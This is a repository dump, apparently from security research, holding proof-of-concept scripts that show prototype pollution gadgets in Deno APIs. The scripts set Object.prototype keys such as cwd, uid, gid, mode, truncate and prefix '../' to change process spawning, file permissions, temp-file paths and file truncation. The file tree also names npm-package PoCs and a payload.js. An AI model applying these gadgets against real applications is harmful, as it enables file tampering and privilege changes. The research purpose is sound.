├── .gitignore ├── LICENSE ├── README.md ├── cert.pem ├── deno ├── Deno │ ├── Command │ │ ├── Command.cwd.PoC.ts │ │ ├── Command.gid.PoC.ts │ │ └── Command.uid.PoC.ts │ ├── makeTempDir │ │ ├── makeTempDir.dir.PoC.ts │ │ ├── makeTempDir.prefix.PoC.ts │ │ ├── makeTempDirSync.dir.PoC.ts │ │ └── makeTempDirSync.prefix.PoC.ts │ ├── makeTempFile │ │ ├── makeTempFile.dir.PoC.ts │ │ ├── makeTempFile.prefix.PoC.ts │ │ ├── makeTempFileSync.dir.PoC.ts │ │ └── makeTempFileSync.prefix.PoC.ts │ ├── mkdir │ │ ├── mkdir.mode.PoC.ts │ │ └── mkdirSync.mode.PoC.ts │ ├── open │ │ ├── open.append.PoC.ts │ │ ├── open.mode.PoC.ts │ │ ├── open.truncate.PoC.ts │ │ ├── openSync.append.PoC.ts │ │ ├── openSync.mode.PoC.ts │ │ └── openSync.truncate.PoC.ts │ ├── run │ │ ├── run.cwd.PoC.ts │ │ ├── run.gid.PoC.ts │ │ └── run.uid.PoC.ts │ ├── writeFile │ │ ├── writeFile.append.PoC.ts │ │ ├── writeFile.mode.PoC.ts │ │ ├── writeFileSync.append.PoC.ts │ │ └── writeFileSync.mode.PoC.ts │ └── writeTextFile │ │ ├── writeTextFile.append.PoC.ts │ │ ├── writeTextFile.mode.PoC.ts │ │ ├── writeTextFileSync.append.PoC.ts │ │ └── writeTextFileSync.mode.PoC.ts ├── Worker │ ├── .gitignore │ ├── Worker.env.PoC.ts │ ├── Worker.ffi.PoC.ts │ ├── Worker.hrtime.PoC.ts │ ├── Worker.net.PoC.ts │ ├── Worker.read.PoC.ts │ ├── Worker.run.PoC.ts │ ├── Worker.sys.PoC.ts │ └── Worker.write.PoC.ts ├── fetch │ └── fetch.PoC.ts ├── node │ ├── child_process │ │ ├── exec.env.PoC.ts │ │ ├── execFileSync.env.PoC.ts │ │ ├── execSync.env.PoC.ts │ │ ├── spawn.env.PoC.ts │ │ ├── spawn.gid.PoC.ts │ │ ├── spawn.uid.PoC.ts │ │ └── spawnSync.env.PoC.ts │ ├── fs │ │ ├── appendFile.length.PoC.ts │ │ ├── appendFile.offset.PoC.ts │ │ ├── writeFile.length.PoC.ts │ │ └── writeFile.offset.PoC.ts │ ├── http │ │ └── request.hostname.PoC.ts │ ├── https │ │ └── request.hostname.PoC.ts │ └── zlib │ │ └── createBrotliCompress.params.PoC.ts └── std │ ├── dotenv │ ├── .env │ ├── .env.default │ ├── .env.other │ ├── load.any.PoC.ts │ ├── 
load.defaultsPath.PoC.ts │ ├── load.envPath.PoC.ts │ ├── load.export.PoC.ts │ ├── loadSync.any.PoC.ts │ ├── loadSync.defaultsPath.PoC.ts │ ├── loadSync.envPath.PoC.ts │ └── loadSync.export.PoC.ts │ ├── json │ ├── JsonStringifyStream.prefix.PoC.ts │ └── JsonStringifyStream.suffix.PoC.ts │ ├── log │ └── FileHandler.formatter.PoC.ts │ ├── tar │ ├── Tar.gid.PoC.ts │ └── Tar.uid.PoC.ts │ └── yaml │ └── stringify.indent.PoC.ts ├── http-server.js ├── https-server.js ├── key.pem ├── nodejs ├── child_process │ ├── exec.env.PoC.js │ ├── execFile.env.PoC.js │ ├── execFileSync.env.PoC.js │ ├── execFileSync.input.win.PoC.js │ ├── execSync.env.PoC.js │ ├── execSync.env.lnx.PoC.js │ ├── execSync.input.win.PoC.js │ ├── fork.env.PoC.js │ ├── package-lock.json │ ├── package.json │ ├── shell.js │ ├── spawn.env.PoC.js │ ├── spawn.input.win.js │ ├── spawnSync.env.PoC.js │ ├── spawnSync.env.lnx.PoC.js │ ├── spawnSync.input.win.PoC.js │ └── test.js ├── http │ ├── fetch.options.PoC.js │ ├── fetch.socketPath.PoC.js │ ├── get.options.PoC.js │ ├── listen.host.PoC.js │ └── requiest.options.PoC.js ├── https │ ├── get.options.PoC.js │ ├── requiest.options.PoC.js │ └── tls.connect.PoC.js ├── import │ ├── import.source.PoC.js │ └── test.mjs ├── require │ ├── package-lock.json │ ├── package.json │ ├── require.main.PoC.js │ ├── require.main2.PoC.js │ └── test_sub_folder │ │ └── index.js └── working_threads │ ├── ctor.PoC.js │ └── test.js └── npm-packages ├── 0-day.zip ├── asyncawait ├── asyncawait.PoC.js ├── package-lock.json └── package.json ├── better-queue ├── better-queue.PoC.js ├── package-lock.json └── package.json ├── binary-parser ├── binary-parser.PoC.js ├── package-lock.json └── package.json ├── bson ├── bson.PoC.js ├── package-lock.json └── package.json ├── chrome-launcher ├── chrome-launcher.PoC.js ├── package-lock.json └── package.json ├── coffee ├── coffee.fork.PoC.js ├── coffee.spawn.PoC.js ├── package-lock.json └── package.json ├── colors.js ├── consolidate ├── jazz.PoC.js ├── 
package-lock.json ├── package.json ├── underscore.PoC.js └── views │ └── underscore.template.html ├── crawler ├── crawler.PoC.js ├── package-lock.json └── package.json ├── cross-port-killer ├── cross-port-killer.PoC.js ├── package-lock.json └── package.json ├── cross-spawn ├── cross-spawn.spawn.PoC.js ├── cross-spawn.spawn.sync.PoC.js ├── package-lock.json └── package.json ├── csv-write-stream ├── csv-write-stream.PoC.js ├── out.csv ├── package-lock.json └── package.json ├── divx.js ├── doT ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json └── views │ ├── mytemplate.jst │ ├── test.def │ └── test.dot ├── dockerfile_lint ├── dockerfile_lint.PoC.js ├── dockerfile_rules.yml ├── package-lock.json └── package.json ├── dot ├── dot.PoC.js ├── package-lock.json ├── package.json └── views │ └── mytemplate.jst ├── download-git-repo ├── download-git-repo.PoC.js ├── package-lock.json └── package.json ├── dtrace-provider ├── dtrace-provider.PoC.js ├── package-lock.json └── package.json ├── dustjs ├── app-0.js ├── package-lock.json ├── package.json └── views │ ├── hello.dust │ ├── includes │ └── mood.dust │ └── index.dust ├── ect ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json └── views │ ├── extra.ect │ ├── footer.html │ ├── header.html │ ├── index.ect │ ├── layout.ect │ ├── layout.html │ ├── page.html │ └── sublayout.html ├── ejs ├── ejs.PoC.js ├── package-lock.json └── package.json ├── ejs@2.7.4 ├── app-0.js ├── app-1.js ├── app-2.js ├── app-3.js ├── package-lock.json ├── package.json └── views │ ├── footer.ejs │ ├── header.ejs │ ├── login_register.ejs │ └── main.ejs ├── esformatter ├── esformatter.PoC.js ├── package-lock.json └── package.json ├── exec ├── exec.PoC.js ├── package-lock.json └── package.json ├── external-editor ├── external-editor.edit.PoC.js ├── external-editor.editAsync.js ├── package-lock.json └── package.json ├── fibers ├── fibers.PoC.js ├── package-lock.json └── package.json ├── find-process ├── find-process.PoC.js ├── 
package-lock.json └── package.json ├── fluent-ffmpeg ├── fluent-ffmpeg.PoC.js ├── package-lock.json └── package.json ├── forever-monitor ├── forever-monitor.PoC.js ├── package-lock.json └── package.json ├── gh-pages ├── dist │ └── test.txt ├── gh-pages.PoC.js ├── package-lock.json └── package.json ├── gift ├── gift.clone.PoC.js ├── package-lock.json └── package.json ├── git-clone ├── git-clone.PoC.js ├── package-lock.json └── package.json ├── gm ├── gm.PoC.js ├── package-lock.json └── package.json ├── growl ├── growl.PoC.js ├── package-lock.json └── package.json ├── hamlet ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json └── views │ ├── layout.hamlet │ └── wrapped.hamlet ├── hamljs ├── app-0.js ├── package-lock.json ├── package.json └── views │ └── page.haml ├── handlebars ├── handlebars.Poc.js ├── package-lock.json └── package.json ├── hbsfy ├── hbsfy.configure.PoC.js ├── package-lock.json └── package.json ├── jade ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json └── views │ ├── attrs.jade │ ├── comments.jade │ ├── each-else.jade │ ├── index.jade │ ├── mixin.jade │ └── when-case.jade ├── jsdoc-api ├── jsdoc-api.explain.PoC.js ├── jsdoc-api.explainSync.PoC.js ├── jsdoc-api.renderSync.PoC.js ├── package-lock.json └── package.json ├── jsdoc-to-markdown ├── jsdoc-test.js ├── jsdoc-to-markdown.render.PoC.js ├── jsdoc-to-markdown.renderSync.PoC.js ├── package-lock.json └── package.json ├── koa-views ├── koa-views.PoC.js ├── package-lock.json ├── package.json └── views │ └── underscore.template.html ├── liftoff ├── liftoff.PoC.js ├── package-lock.json └── package.json ├── lodash.template ├── lodash.template.PoC.js ├── package-lock.json └── package.json ├── mote ├── app-0.js ├── package-lock.json ├── package.json └── views │ └── template.html ├── mrm-core ├── mrm-core.PoC.js ├── package-lock.json └── package.json ├── node-blade ├── app-1.js ├── app-2.js ├── app-3.js ├── app-4.js ├── app-5.js ├── app-6.js ├── package-lock.json ├── 
package.json └── views │ ├── attributes2.blade │ ├── attributes_ids_classes.blade │ ├── attributes_interpolation.blade │ ├── attributes_multi_line.blade │ ├── blank_lines.blade │ ├── block-comment.blade │ ├── blocks.blade │ ├── blocks2.blade │ ├── blocks3.blade │ ├── code.blade │ ├── code_multiline.blade │ ├── comments.blade │ ├── doctype.blade │ ├── event_handlers.blade │ ├── exposing_child.blade │ ├── exposing_parent.blade │ ├── factorial.blade │ ├── filters.blade │ ├── foreach.blade │ ├── functions.blade │ ├── functions2.blade │ ├── functions_and_block.blade │ ├── functions_and_block_include.blade │ ├── include.blade │ ├── include2.blade │ ├── include_in_func.blade │ ├── include_in_replace_block.blade │ ├── include_in_replace_block │ ├── block_content.blade │ ├── block_def.blade │ ├── replace_block.blade │ └── replace_block_include.blade │ ├── included.blade │ ├── interpolate.blade │ ├── interpolate2.blade │ ├── layer1.blade │ ├── layer2.blade │ ├── layer3.blade │ ├── layer3_render.blade │ ├── liveui.blade │ ├── many_doctypes.blade │ ├── tag_whitespace.blade │ ├── tags.blade │ └── text_blocks.blade ├── nodemailer ├── nodemailer.PoC.js ├── package-lock.json └── package.json ├── payload.js ├── ping ├── package-lock.json ├── package.json └── ping.PoC.js ├── play-sound ├── package-lock.json ├── package.json ├── play-sound.ctor.PoC.js └── play-sound.play.PoC.js ├── primus ├── package-lock.json ├── package.json ├── primus.parser.PoC.js └── primus.transformer.PoC.js ├── pug ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json ├── pug.Poc.js └── views │ └── attrs.pug ├── python-shell ├── package-lock.json ├── package.json └── python-shell.PoC.js ├── ractive ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json └── views │ └── template.ract ├── require-from-string ├── package-lock.json ├── package.json └── require-from-string.PoC.js ├── requireg ├── package-lock.json ├── package.json └── requireg.PoC.js ├── saker ├── app-0.js ├── package-lock.json 
├── package.json └── views │ ├── template.html │ └── template1.html ├── sonarqube-scanner ├── package-lock.json ├── package.json └── sonarqube-scanner.PoC.js ├── squirrelly ├── app-0.js ├── app-1.js ├── package-lock.json ├── package.json └── views │ ├── each.sqrl │ └── index.squirrelly ├── tangular ├── app-0.js ├── package-lock.json ├── package.json └── views │ ├── template.html │ └── template1.html ├── teen_process ├── package-lock.json ├── package.json └── teen_process.PoC.js ├── the-script-jsdoc ├── my_project_dir │ ├── jsdoc.json │ └── test.txt ├── package-lock.json ├── package.json └── the-script-jsdoc.PoC.js ├── tingodb ├── localdb │ └── test_collection ├── package-lock.json ├── package.json └── tingodb.PoC.js ├── window-size ├── package-lock.json ├── package.json └── window-size.PoC.js ├── winreg ├── package-lock.json ├── package.json └── winreg.PoC.js └── workerpool ├── package-lock.json ├── package.json └── workerpool.PoC.js /.gitignore: -------------------------------------------------------------------------------- 1 | # Dependency directories 2 | node_modules/ 3 | 4 | # Optional npm cache directory 5 | .npm 6 | 7 | # yarn v2 8 | .yarn/cache 9 | .yarn/unplugged 10 | .yarn/build-state.yml 11 | .yarn/install-state.gz 12 | .pnp.* -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Mikhail Shcherbakov 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and 
this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /cert.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIFazCCA1OgAwIBAgIUB8Pp5inydI6toKpYoTY6DUgzvvwwDQYJKoZIhvcNAQEL 3 | BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM 4 | GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yNDAyMDIxMDA1MDdaFw0yNTAy 5 | MDExMDA1MDdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw 6 | HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggIiMA0GCSqGSIb3DQEB 7 | AQUAA4ICDwAwggIKAoICAQCt5wfaFhHqTpkKHvfPYg9tHe7DtewZHKAxTJzQXazK 8 | LjCy2zRumph9mSdT8kaX3bx7Smmj5XKHSSIsrmYifbCKBDjHY3DXnEWtNsNb8SE3 9 | q8AwDjCg16FEtRLUdGjcXNd35dW9yiX38vjMcaYu//dkg07Fh8oldTwxmovhWQUJ 10 | W4IBYHzZCV++Zqvg+DwpuYIR1oYfBB4yrhTTSOTo3mWDaXTfaV/a7LK4tStZb5zT 11 | LllBr2hw9RTrKGFYoOWuccvuk+t29+i7vw4pcrn1fvQpdFusiyjxiQ4pjEXfh7qO 12 | TvGuT9YniK/XpTF6aqmxOxAaPtQlS/0iz67G0EirEA/9haoUKpOdwMP0PIFV7LV1 13 | /Q+Z7qRBYFMZQfgHX6KZYBImTllZ1wVf8+eyYLXclkRVsz2QiEFH8vwznS6skUOT 14 | J1q4clJmor2ppgtL4Sfo8VJpOcxGRm1eVR6Op1c4hN8ExVCoeBiq3YhMzbwkdZ6Z 15 | 694UIq3JjPj+TGCLU0o0Jz5+DMPfbVfg/Cdhkw89E+PVjS1hDWGFhaOyabmD3iPG 16 | WH9hXN7ObDO2Q0a5Av1t4tBVSxSoFEHjHNLt7Vs4EjAkLQ1ZiMeJSa+eKsGA1pSr 17 | Ix1Cmt7mFG1LPS4mIiRicNzs1gp+7URFMq+C2Kj2bdnhw8CqaISdXLDrSIRh4yWU 18 | xQIDAQABo1MwUTAdBgNVHQ4EFgQUwtHL51h7NLxHE4fUug+4atf3EI0wHwYDVR0j 19 | 
BBgwFoAUwtHL51h7NLxHE4fUug+4atf3EI0wDwYDVR0TAQH/BAUwAwEB/zANBgkq 20 | hkiG9w0BAQsFAAOCAgEANorhzbOYOyqAQiGtrEbi1p1HfuoFKkA7Wba2F2YKkAgV 21 | YTOTFd4hX6jH4mcIt8zztVUvcG/Li86AacAbqofvVqivmwuW1UalbN4CLnBt136D 22 | to683NC1Wrh9SokAOfuitfg+RAVwU5wnDhYCuAOwpT9G0dw9w76B0UsIQHXngpQi 23 | /DtsOu+gehPoFzQiiqJxxGDjz40IrvnWj1MMwOK2epZelroqzY5MpJmADKA/BAeF 24 | GwXnXA95y/eLL+3RxEKg3JsArSmYn+EkUD4+CqnT/jVScraib3E7qSnbHeYqJt62 25 | 27qbCf93K/m0lMLf1P4C8N4swKMC9VFu5czIZYFvhAuo4TK+S/tvgU+9OHqEHE39 26 | 4KFZSX1t05t+3TSz0qDCEm8dTaS8MWdcq388CX61KPKMhSWmaoeqq0GPlrxVSKo+ 27 | Jns+A2D/E1wWnzilG4YjQVsaztMdPz5ckRCP7wKLMaKKsSq03FkGHeb8j3UmyF2K 28 | /ggC5C9eQor/AA1YXGDJkSqohaPODvpdMuZFC3h9qXoeljbYyyJQo4VcmRzqr0z9 29 | hW/AHhmOPguhw4jr6A6YKbbcZf6vu/RiMBonOdyR9RhW0OqYggaF/iRPwDoS3/UL 30 | rHAaq8oh6D3VwoBm3w/7qe6Xn1axXcNMqUjl5LmGhMYHkDskbNbULB8jhjLmkEo= 31 | -----END CERTIFICATE----- 32 | -------------------------------------------------------------------------------- /deno/Deno/Command/Command.cwd.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("cwd", "/"); 6 | const process = new Deno.Command("ls"); 7 | process.spawn(); 8 | -------------------------------------------------------------------------------- /deno/Deno/Command/Command.gid.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("gid", 42); 6 | const process = new Deno.Command("id"); 7 | process.spawn() 8 | -------------------------------------------------------------------------------- /deno/Deno/Command/Command.uid.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) 
as any) = value; 3 | } 4 | 5 | pollute("uid", 42); 6 | const process = new Deno.Command("id"); 7 | process.spawn() 8 | -------------------------------------------------------------------------------- /deno/Deno/makeTempDir/makeTempDir.dir.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("dir", "."); 6 | 7 | const path = await Deno.makeTempDir(); 8 | console.log(path); 9 | -------------------------------------------------------------------------------- /deno/Deno/makeTempDir/makeTempDir.prefix.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("prefix", "../"); 6 | 7 | // NOTE: providing dir only for illustrative purposes 8 | const path = await Deno.makeTempDir({ dir: "." }); 9 | console.log(path); 10 | -------------------------------------------------------------------------------- /deno/Deno/makeTempDir/makeTempDirSync.dir.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("dir", "."); 6 | 7 | const path = Deno.makeTempDirSync(); 8 | console.log(path); 9 | -------------------------------------------------------------------------------- /deno/Deno/makeTempDir/makeTempDirSync.prefix.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("prefix", "../"); 6 | 7 | // NOTE: providing dir only for illustrative purposes 8 | const path = Deno.makeTempDirSync({ dir: "." 
}); 9 | console.log(path); 10 | -------------------------------------------------------------------------------- /deno/Deno/makeTempFile/makeTempFile.dir.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("dir", "."); 6 | 7 | const path = await Deno.makeTempFile(); 8 | console.log(path); 9 | -------------------------------------------------------------------------------- /deno/Deno/makeTempFile/makeTempFile.prefix.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("prefix", "../"); 6 | 7 | // NOTE: providing dir only for illustrative purposes 8 | const path = await Deno.makeTempFile({ dir: "." }); 9 | console.log(path); 10 | -------------------------------------------------------------------------------- /deno/Deno/makeTempFile/makeTempFileSync.dir.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("dir", "."); 6 | 7 | const path = Deno.makeTempFileSync(); 8 | console.log(path); 9 | -------------------------------------------------------------------------------- /deno/Deno/makeTempFile/makeTempFileSync.prefix.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("prefix", "../"); 6 | 7 | // NOTE: providing dir only for illustrative purposes 8 | const path = Deno.makeTempFileSync({ dir: "." 
}); 9 | console.log(path); 10 | -------------------------------------------------------------------------------- /deno/Deno/mkdir/mkdir.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | async function createAndLog(name: string) { 6 | // NOTE: the second argument (options) must not be undefined 7 | await Deno.mkdir(`./${name}`, {}); 8 | 9 | const fileInfo = await Deno.stat(`./${name}`); 10 | console.log("mode:", fileInfo.mode); 11 | 12 | Deno.remove(`./${name}`); 13 | } 14 | 15 | await createAndLog("unpolluted"); 16 | pollute("mode", 0o000); 17 | await createAndLog("polluted"); 18 | -------------------------------------------------------------------------------- /deno/Deno/mkdir/mkdirSync.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | async function createAndLog(name: string) { 6 | // NOTE: the second argument (options) must not be undefined 7 | Deno.mkdirSync(`./${name}`, {}); 8 | 9 | const fileInfo = await Deno.stat(`./${name}`); 10 | console.log("mode:", fileInfo.mode); 11 | 12 | Deno.remove(`./${name}`); 13 | } 14 | 15 | await createAndLog("unpolluted"); 16 | pollute("mode", 0o000); 17 | await createAndLog("polluted"); 18 | -------------------------------------------------------------------------------- /deno/Deno/open/open.append.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = new TextEncoder().encode("foobar"); 6 | 7 | async function create(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await 
file.write(data); 10 | file.close(); 11 | } 12 | 13 | async function writeThenRead(name) { 14 | const wfile = await Deno.open(`./${name}`, { write: true }); 15 | await wfile.write(data); 16 | wfile.close(); 17 | 18 | const rfile = await Deno.open(`./${name}`, { read: true, append: false }); 19 | const buffer = new Uint8Array(16); 20 | const count = await rfile.read(buffer); 21 | const text = new TextDecoder().decode(buffer); 22 | console.log(name, "contains", text, `(${count} bytes)`); 23 | rfile.close(); 24 | 25 | Deno.remove(`./${name}`); 26 | } 27 | 28 | await create("unpolluted"); 29 | await create("polluted"); 30 | 31 | await writeThenRead("unpolluted"); 32 | pollute("append", true); 33 | await writeThenRead("polluted"); 34 | -------------------------------------------------------------------------------- /deno/Deno/open/open.mode.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const data = new TextEncoder().encode("foobar"); 6 | 7 | async function writeThenRead(name) { 8 | const file = await Deno.open(`./${name}`, { create: true, write: true }); 9 | await file.write(data); 10 | file.close(); 11 | 12 | const fileInfo = await Deno.stat(`./${name}`); 13 | console.log(name, "mode:", fileInfo.mode); 14 | 15 | Deno.remove(`./${name}`); 16 | } 17 | 18 | await writeThenRead("unpolluted"); 19 | pollute("mode", 0o777); 20 | await writeThenRead("polluted"); 21 | -------------------------------------------------------------------------------- /deno/Deno/open/open.truncate.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | const orgData = new TextEncoder().encode("Hello world!"); 6 | const newData = new TextEncoder().encode("foobar"); 7 | 8 | 
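async function create(name) {
9 |   // Seed ./<name> with orgData so that a truncating open shows up in the read-back.
10 |   // Uses the async Deno.open, the API this file is named for.
11 |   const file = await Deno.open(`./${name}`, { create: true, write: true });
12 |   await file.write(orgData);
13 |   file.close();
14 | }
15 |
16 | // Overwrites the start of ./<name> with newData, logs what the file then contains, and removes it.
17 | async function writeThenRead(name) {
18 |   // `truncate` is not an own property of this options object, so a plain property
19 |   // read of it returns whatever Object.prototype.truncate holds at call time.
20 |   const wfile = await Deno.open(`./${name}`, { write: true });
21 |   await wfile.write(newData);
22 |   wfile.close();
23 |
24 |   // The read-back sets `truncate: false` as an own property, which shadows the polluted default.
25 |   const rfile = await Deno.open(`./${name}`, { read: true, truncate: false });
26 |   const buffer = new Uint8Array(16);
27 |   const count = await rfile.read(buffer);
28 |   // Decodes all 16 bytes, so unused trailing zero bytes are part of the logged text.
29 |   const text = new TextDecoder().decode(buffer);
30 |   console.log(name, "contains", text, `(${count} bytes)`);
31 |   rfile.close();
32 |
33 |   Deno.remove(`./${name}`); // not awaited: the removal may finish after this function returns
34 | }
35 |
36 | await create("unpolluted");
37 | await create("polluted");
38 |
39 | // Baseline first, then the same call with Object.prototype.truncate set. If the runtime
40 | // honours the inherited flag, the polluted file reads back as newData only instead of
41 | // newData followed by the tail of orgData. Runtimes avoid this by reading options through
42 | // own-property checks or from a null-prototype copy.
43 | await writeThenRead("unpolluted");
44 | pollute("truncate", true);
45 | await writeThenRead("polluted");
46 |
--------------------------------------------------------------------------------
/deno/Deno/open/openSync.append.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 |   ((((Object as any).prototype as any)[key]) as any) = value; // objects without an own `key` now read `value` through the prototype
3 | }
4 |
5 | const data = new TextEncoder().encode("foobar");
6 |
7 | async function create(name) {
8 |   const file = Deno.openSync(`./${name}`, { create: true, write: true });
9 |   await file.write(data);
10 |   file.close();
11 | }
12 |
13 | async function writeThenRead(name) {
14 |   const wfile = Deno.openSync(`./${name}`, { write: true }); // no own `append` on these options
15 |   await wfile.write(data);
16 |   wfile.close();
17 |
18 |   const rfile = Deno.openSync(`./${name}`, { read: true, append: false }); // own `append: false` shadows the polluted default
19 |   const buffer = new Uint8Array(16);
20 |   const count = await rfile.read(buffer);
21 |   const text = new TextDecoder().decode(buffer);
22 |   console.log(name, "contains", text, `(${count} bytes)`);
23 |   rfile.close();
24 |
25 |   Deno.remove(`./${name}`);
26 | }
27 |
28 | await create("unpolluted");
29 | await create("polluted");
30 |
31 | await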
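writeThenRead("unpolluted");
32 | pollute("append", true);
33 | await writeThenRead("polluted");
34 |
--------------------------------------------------------------------------------
/deno/Deno/open/openSync.mode.PoC.ts:
--------------------------------------------------------------------------------
1 | // Sets Object.prototype[key]; objects without an own `key` then read `value` through the prototype.
2 | function pollute(key: string, value: any) {
3 |   ((((Object as any).prototype as any)[key]) as any) = value;
4 | }
5 |
6 | const data = new TextEncoder().encode("foobar");
7 |
8 | // Creates ./<name> passing only `create` and `write`, logs the mode Deno.stat reports, and removes the file.
9 | async function writeThenRead(name) {
10 |   // `mode` is not an own property of the options object, so a plain read of it
11 |   // falls through to Object.prototype.mode once that has been set.
12 |   const file = Deno.openSync(`./${name}`, { create: true, write: true });
13 |   await file.write(data);
14 |   file.close();
15 |
16 |   const fileInfo = await Deno.stat(`./${name}`);
17 |   console.log(name, "mode:", fileInfo.mode);
18 |
19 |   Deno.remove(`./${name}`); // not awaited: the removal may finish after this function returns
20 | }
21 |
22 | // Baseline first, then the same call with Object.prototype.mode set to 0o777. A different
23 | // logged mode for "polluted" means the creation mode came from the prototype chain rather
24 | // than from the caller, which can leave a new file more permissive than the code asked for.
25 | await writeThenRead("unpolluted");
26 | pollute("mode", 0o777);
27 | await writeThenRead("polluted");
28 |
--------------------------------------------------------------------------------
/deno/Deno/open/openSync.truncate.PoC.ts:
--------------------------------------------------------------------------------
1 | function pollute(key: string, value: any) {
2 |   ((((Object as any).prototype as any)[key]) as any) = value;
3 | }
4 |
5 | const orgData = new TextEncoder().encode("Hello world!");
6 | const newData = new TextEncoder().encode("foobar");
7 |
8 | async function create(name) {
9 |   const file = Deno.openSync(`./${name}`, { create: true, write: true }); // Deno.openSync is the API this file is named for
10 |   await file.write(orgData);
11 |   file.close();
12 | }
13 |
14 | async function writeThenRead(name) {
15 |   const wfile = Deno.openSync(`./${name}`, { write: true }); // no own `truncate` on these options
16 |   await wfile.write(newData);
17 |   wfile.close();
18 |
19 |   const rfile = Deno.openSync(`./${name}`, { read: true, truncate: false }); // own `truncate: false` shadows the polluted default
20 |   const buffer = new Uint8Array(16);
21 |   const count = await rfile.read(buffer);
22 |   const text = new TextDecoder().decode(buffer);
23 |   console.log(name, "contains", text, `(${count} bytes)`);
24 |   rfile.close();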
25 | 26 | Deno.remove(`./${name}`); 27 | } 28 | 29 | await create("unpolluted"); 30 | await create("polluted"); 31 | 32 | await writeThenRead("unpolluted"); 33 | pollute("truncate", true); 34 | await writeThenRead("polluted"); 35 | -------------------------------------------------------------------------------- /deno/Deno/run/run.cwd.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("cwd", "/"); 6 | const process = Deno.run({ cmd: ["ls"] }); 7 | console.log(process); 8 | -------------------------------------------------------------------------------- /deno/Deno/run/run.gid.PoC.ts: -------------------------------------------------------------------------------- 1 | function pollute(key: string, value: any) { 2 | ((((Object as any).prototype as any)[key]) as any) = value; 3 | } 4 | 5 | pollute("gid", 42); 6 | const process = Deno.run({ cmd: ["id"] }); 7 | console.log(process); 8 | -------------------------------------------------------------------------------- /deno/Deno/run/run.uid.PoC.ts: 